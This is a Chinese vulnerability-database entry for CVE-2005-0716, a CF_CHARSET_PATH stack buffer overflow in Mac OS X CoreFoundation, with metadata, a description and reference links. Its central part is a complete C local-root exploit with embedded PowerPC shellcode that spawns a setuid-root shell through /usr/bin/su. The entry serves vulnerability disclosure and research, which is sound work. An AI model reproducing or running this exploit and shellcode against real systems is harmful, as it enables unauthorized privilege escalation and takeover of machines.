Mac OS X CF_CHARSET_PATH环境变量处理缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1108563 漏洞类型 缓冲区溢出
发布时间 2005-03-22 更新时间 2006-08-02
CVE编号 CVE-2005-0716 CNNVD-ID CNNVD-200503-124
漏洞平台 OSX CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/896
https://www.securityfocus.com/bid/13224
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200503-124
|漏洞详情
MacOSX是苹果家族的操作系统。MacOSX中默认捆绑的CoreFoundation程序库中存在缓冲区溢出漏洞,可能允许攻击者获取root用户权限。漏洞的起因是由于没有正确的处理CF_CHARSET_PATH环境变量。如果通过这个变量传送了大于1024个字符的字符串的话,就可能导致栈溢出,允许攻击者通过在栈中覆盖函数的返回地址来控制程序流。任何链接到CoreFoundation函数库上的应用程序都可用作这个漏洞的攻击载体。一些有漏洞的setuidroot二进制程序包括su,pppd和login等。
|漏洞EXP
/*[ MacOS X[CF_CHARSET_PATH]: local root exploit. ]*********
*                                                         *
* by: v9@fakehalo.us (fakehalo/realhalo)                  *
*                                                         *
* found by: iDefense (anon finder)                        *
*                                                         *
* saw the advisory on bugtraq and figured i'd slap this   *
* together, so simple i had to.  exploits via the         *
* /usr/bin/su binary.  you must press ENTER at the        *
* "Password: " prompt.                                    *
***********************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
static char exec[]= /* b-r00t's setuid(0)+exec(/bin/sh). */
"\x7c\x63\x1a\x79\x40\x82\xff\xfd\x7d\x68\x02\xa6\x3b\xeb"
"\x01\x70\x39\x40\x01\x70\x39\x1f\xfe\xdf\x7c\x68\x19\xae"
"\x38\x0a\xfe\xa7\x44\xff\xff\x02\x60\x60\x60\x60\x7c\xa5"
"\x2a\x79\x38\x7f\xfe\xd8\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x38\x81\xff\xf8\x38\x0a\xfe\xcb\x44\xff\xff\x02\x7c\xa3"
"\x2b\x78\x38\x0a\xfe\x91\x44\xff\xff\x02\x2f\x62\x69\x6e"
"\x2f\x73\x68\x58";
int main(void){
unsigned int i=0;
char *buf,*env[3];
printf("(*)MacOS X[CF_CHARSET_PATH]: local root exploit.\n");
printf("(*)by: v9@fakehalo.us, found by iDefense adv. (anon)\n\n");
if(!(buf=(char *)malloc(1100+1)))exit(1);
memcpy(buf,"CF_CHARSET_PATH=",16);
printf("[*] setting up the environment.\n");
for(i=16;i<1100;i+=4)*(long *)&buf[i]=(0xbffffffa-strlen(exec));
env[0]=buf;
env[1]=exec;
env[2]=NULL;
printf("[*] executing su... (press ENTER at the \"Password: \""
" prompt)\n\n");
if(execle("/usr/bin/su","su",0,env))
 printf("[!] failed executing /usr/bin/su.\n");
exit(0);
}

// milw0rm.com [2005-03-22]
|受影响的产品
Apple Mac OS X Server 10.3.8 Apple Mac OS X Server 10.3.7 Apple Mac OS X Server 10.3.6 Apple Mac OS X Server 10.3.5 Apple Mac OS X Server 10.3.4 Apple Mac OS X Server 10.
|参考资料

来源:IDEFENSE
名称:20050321MacOSXCF_CHARSET_PATHBufferOverflowVulnerability
链接:http://www.idefense.com/application/poi/display?id=219&type=vulnerabilities
来源:APPLE
名称:APPLE-SA-2005-03-21
链接:http://lists.apple.com/archives/security-announce/2005/Mar/msg00000.html
来源:BID
名称:13224
链接:http://www.securityfocus.com/bid/13224